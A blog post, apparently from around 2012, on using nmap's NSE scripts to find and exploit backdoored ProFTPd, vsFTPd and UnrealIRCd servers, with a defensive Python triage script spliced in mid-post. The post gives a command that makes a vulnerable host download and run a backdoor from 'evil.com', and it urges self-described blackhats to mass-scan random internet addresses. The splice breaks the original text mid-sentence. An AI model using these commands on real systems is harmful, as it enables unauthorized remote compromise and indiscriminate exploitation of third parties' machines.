Scanning for Backdoors with nmap's NSE
Nmap is not just limited to port scanning and host OS / service version detection and such; it also features an AWESOME scripting engine (the NSE) which uses Lua for its scripts. I hope to cover many "fun" uses of nmap's scripting engine over the next while, though this post is going to be a bit... edgier and more "evil" in a sense. Also VITALLY useful and important for those of you hunting down backdoored boxes!!

Every so often someone pops an open source project's SVN or such, and backdoors the source code. This source code then finds its way onto potentially millions of systems, depending on if/when the breach is detected, or the backdoor is noticed. Sometimes, someone writes an nmap script to scan for such compromised systems, and, god forbid, even exploit them!

We will be showing off the following three scripts in this post, and using them as a primer for using nmap's scripts. (I will only be giving demo usage of one; the other two are the same and are left to the reader as an exercise.)

ftp-proftpd-backdoor.nse
ftp-vsftpd-backdoor.nse
irc-unrealircd-backdoor.nse

These scripts are intended to locate backdoored installations of ProFTPd, vsFTPd, and UnrealIRCd, respectively.

For the example, we will use "ftp-proftpd-backdoor.nse". This script is intended to locate backdoored installations of ProFTPd - OSVDB-ID 69562 - and tests them using the "id" command. Please note, this is regarded as a "remote root" vulnerability and was (and is) actively exploited in the wild.

Basic Usage:

root@bha:~# nmap --script ftp-proftpd-backdoor victim.tld

This simply tests for the vulnerability, using all defaults. Nothing too special, but VERY useful for quickly testing.

Using as an exploit!

This script takes an argument that allows you to specify a custom command to run on the vulnerable system, which is VERY useful during a penetration test!

root@bha:~# nmap --script ftp-proftpd-backdoor --script-args ftp-proftpd-backdoor.cmd="wget http://evil.com/backdoor.pl & perl backdoor.pl" victim.tld

Please note the --script-args followed by the argument (arg=var format) showing what command to run. In this example we have it forcing the vulnerable host to download and run a backdoor. (Yes, another one. This time maybe a reverse shell, or a loader for something like Jynx Rootkit...)

Mass Haxploitation?

Ok. Now for the real blackhats in the audience... Yes, you can scan ranges with this. Just replace target.tld with your standard CIDR range specifier... OR... for those who are less discriminate, the -iR flag and not bothering to specify a target range will simply scan IPs at random. Further optimizations include the -p21 (only port 21) argument, the -T5 (Insane scan speed) and -P0 (Don't waste my time pinging!) arguments...

The other two are similar. To get information on them (an exercise best left to the reader), perhaps the following may be of assistance:

root@bha:~# nmap --script-help ftp-proftpd-backdoor

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-16 00:41 IST

ftp-proftpd-backdoor
Categories: exploit intrusive malware vuln
http://nmap.org/nsedoc/scripts/ftp-proftpd-backdoor.html
  Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID
  69562. This script attempts to exploit the backdoor using the innocuous
  <code>id</code> command by default, but that can be changed with the
  <code>ftp-proftpd-backdoor.cmd</code> script argument.

See? You can ask for help! Just pass the name of the script to nmap, and it will help you out using the nsedoc engine :)

Another challenge that I put out there for any aspiring evil geniuses: How about using all three scripts AT ONCE? Optimized? It CAN be done, and when I get back I will show how. Just for now...
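A worked example, added here and not part of the original post: if you are the one hunting backdoored boxes across your own inventory, you run the three scripts with -oX and then want a triage list of which hosts were flagged rather than raw nmap output. The XML below is a constructed sample in nmap's -oX layout (addresses, hostnames, versions and script output text are made up); the assumption that these scripts only emit a <script> element when they have something to report, and the "NOT VULNERABLE" filter in case a verbose run reports negatives, are mine, not something the post or nmap documents.

```python
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -oX sweep.xml` output for a sweep with all three
# backdoor scripts. Hosts, versions and output strings are invented for the demo.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -p21,6667 --script ftp-proftpd-backdoor,ftp-vsftpd-backdoor,irc-unrealircd-backdoor -oX sweep.xml 10.0.0.0/28">
  <host>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <hostnames><hostname name="ftp1.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <service name="ftp" product="ProFTPD" version="1.3.3c"/>
        <script id="ftp-proftpd-backdoor" output="This installation has been backdoored."/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="10.0.0.6" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <service name="ftp" product="vsftpd" version="3.0.2"/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="10.0.0.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="6667">
        <state state="open"/>
        <service name="irc" product="Unreal ircd"/>
        <script id="irc-unrealircd-backdoor" output="Looks like a trojaned version of unrealircd."/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# The three scripts named in the post, mapped to a label for the triage report.
BACKDOOR_SCRIPTS = {
    "ftp-proftpd-backdoor": "ProFTPD 1.3.3c backdoor (OSVDB-ID 69562)",
    "ftp-vsftpd-backdoor": "vsFTPd backdoor",
    "irc-unrealircd-backdoor": "UnrealIRCd backdoor",
}


def find_backdoored_hosts(xml_text):
    """Return (address, port, script_id, output) for every port where one of
    the three backdoor scripts left a <script> element.

    Assumption (mine): these scripts only produce output when the backdoor
    responds, so the element's presence is the signal. As a hedge for verbose
    runs that might report negatives, anything saying NOT VULNERABLE is skipped.
    """
    root = ET.fromstring(xml_text)
    hits = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:  # fall back to whatever address element exists
            addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            portid = int(port.get("portid"))
            for script in port.findall("script"):
                sid = script.get("id")
                output = script.get("output", "")
                if sid in BACKDOOR_SCRIPTS and "NOT VULNERABLE" not in output.upper():
                    hits.append((addr, portid, sid, output))
    return hits


def triage_report(xml_text):
    """One line per flagged host, ready to hand to whoever owns the box."""
    return [
        f"{addr}:{port} -> {BACKDOOR_SCRIPTS[sid]}: {output.strip()}"
        for addr, port, sid, output in find_backdoored_hosts(xml_text)
    ]


if __name__ == "__main__":
    for line in triage_report(SAMPLE_XML):
        print(line)
```

Run it against a real sweep by replacing SAMPLE_XML with the contents of the file you passed to -oX; the 10.0.0.6 host in the sample shows the expected silent case, where vsftpd was scanned and nothing was reported.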
See below :P Best regards, and a note: I likely will not be writing too much over the next couple of days, as I just turned 20 and plan on being rather hungover and TOTALLY useless for a day or so... However, my other stuff is at http://insecurety.net/ and http://theinfodox.blogspot.com (migrating that to here...)... Also, checking out http://blackhatacademy.org is an EXCELLENT idea!